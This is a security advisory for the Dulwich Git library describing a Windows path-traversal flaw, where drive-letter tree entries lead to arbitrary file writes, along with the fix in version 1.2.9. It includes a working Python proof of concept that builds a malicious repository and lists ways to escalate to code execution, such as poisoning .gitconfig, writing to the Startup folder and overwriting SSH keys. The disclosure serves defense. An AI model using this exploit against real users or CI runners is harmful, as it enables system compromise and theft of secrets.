---
id: GHSA-8mcx-5rqc-vhmf
title: >-
  Dulwich: Arbitrary File Write (RCE) on Windows via Unvalidated Drive Letters
  in Tree Paths
summary: >-
  Dulwich: Arbitrary File Write (RCE) on Windows via Unvalidated Drive Letters
  in Tree Paths
severity: high
cvss: 8.8
cwe:
  - CWE-22
vendor: dulwich
product: dulwich
ecosystem: pip
affected:
  - dulwich < 1.2.9
patched:
  - dulwich 1.2.9
published: '2026-10-02'
updated: '2026-10-02'
sourceUpdated: '2026-10-02T19:14:22Z'
source: GHSA
sourceUrl: 'https://github.com/advisories/GHSA-8mcx-5rqc-vhmf'
references:
  - url: 'https://github.com/jelmer/dulwich/security/advisories/GHSA-8mcx-5rqc-vhmf'
  - url: >-
      https://github.com/jelmer/dulwich/commit/4ca77f9f470742ba246cd6fa07beb6d735045664
  - url: 'https://github.com/jelmer/dulwich/releases/tag/dulwich-1.2.9'
  - url: 'https://github.com/advisories/GHSA-8mcx-5rqc-vhmf'
tags:
  - ghsa
  - pip
ingestedAt: '2026-10-02T22:33:09.855Z'
---

## Overview

### Affected files
* `dulwich/index.py` (Methods: `validate_path_element_ntfs`, `_tree_to_fs_path`)
* `dulwich/porcelain/__init__.py` (Method: `_checked_worktree_path`)

### Description / Summary
A High-severity Path Traversal vulnerability exists in Dulwich's checkout logic when running on Windows. The functions responsible for validating NTFS paths strictly reject `.git` variants, Alternate Data Streams (ADS), `git~1` short names, and reserved device names, but they completely fail to check for **DOS drive letter prefixes**.

A malicious Git tree can contain an entry named `C:`. When Dulwich processes this tree on a Windows client, the string passes the `validate_path_element_ntfs` check. Later, `_tree_to_fs_path` passes this path to `os.path.join(root, b"C:\\\\Users\\\\...")`. 

On Windows, if the second argument to `os.path.join` contains an absolute drive letter, the `root` path is completely discarded. As a result, Dulwich writes the repository file to the absolute path outside of the intended Git worktree.

While the standard C `git` client explicitly blocks this via `has_dos_drive_prefix()` in `path.c`, Dulwich lacks this protection. Because Git trees are cross-platform, an attacker can author a malicious repository on Linux and wait for a Windows victim (or CI runner) to clone it.

### Potential impact

This vulnerability allows an attacker to achieve **Arbitrary File Write**, which can trivially be escalated to **Remote Code Execution (RCE)** or total system compromise on the victim's Windows machine.

Attack vectors include:
1. **Git Config Poisoning (RCE):** Writing a malicious `C:\\Users\\<victim>\\.gitconfig` file to set `core.sshCommand` to an arbitrary executable, granting RCE the next time the user interacts with Git.
2. **Persistence (RCE):** Dropping a malicious executable into `C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\StartUp\\`.
3. **SSH Key Overwrite:** Writing to `C:\\Users\\<victim>\\.ssh\\authorized_keys` to compromise remote servers accessible by the victim.
4. **CI/CD Compromise:** If a Windows-based CI/CD runner (e.g., GitHub Actions) automatically clones a malicious pull request, the runner is instantly compromised, potentially leaking repository secrets.

### Proof of Concept (PoC)
The following Python script (runnable on Linux) generates a malicious Git repository containing a payload that targets Windows clients.

```python
from dulwich.objects import Blob, Tree, Commit
from dulwich.repo import Repo
import os, tempfile

repo_path = tempfile.mkdtemp()
repo = Repo.init(repo_path)

# 1. Build the payload blob.
blob = Blob(); blob.data = b"pwned-by-drive-letter\\n"
repo.object_store.add_object(blob)

# 2. Build the malicious tree hierarchy: C:/Users/victim/evil.txt
evil_txt = Tree();   evil_txt[b"evil.txt"] = (0o100644, blob.id)
repo.object_store.add_object(evil_txt)
victim_dir = Tree(); victim_dir[b"victim"] = (0o040000, evil_txt.id)
repo.object_store.add_object(victim_dir)
users_dir  = Tree(); users_dir[b"Users"]   = (0o040000, victim_dir.id)
repo.object_store.add_object(users_dir)

# VULNERABILITY: The "C:" directory bypasses validation
c_drive    = Tree(); c_drive[b"C:"]        = (0o040000, users_dir.id)
repo.object_store.add_object(c_drive)

commit = Commit()
commit.tree = c_drive.id
commit.message = b"add feature"
commit.author = commit.committer = b"attacker <a@evil.example>"
commit.author_time = commit.commit_time = 1700000000
commit.author_timezone = commit.committer_timezone = 0
repo.object_store.add_object(commit)
repo.refs[b"refs/heads/main"] = commit.id

print(f"Malicious repo created at {repo_path}")
print(f"Clone with: dulwich clone {repo_path} /target/win/worktree")
# Result: A Windows checkout of this commit writes the payload directly to C:\\Users\\victim\\evil.txt
```

## Affected packages

- `dulwich < 1.2.9`

## Remediation

Upgrade to a patched release:

- `dulwich 1.2.9`
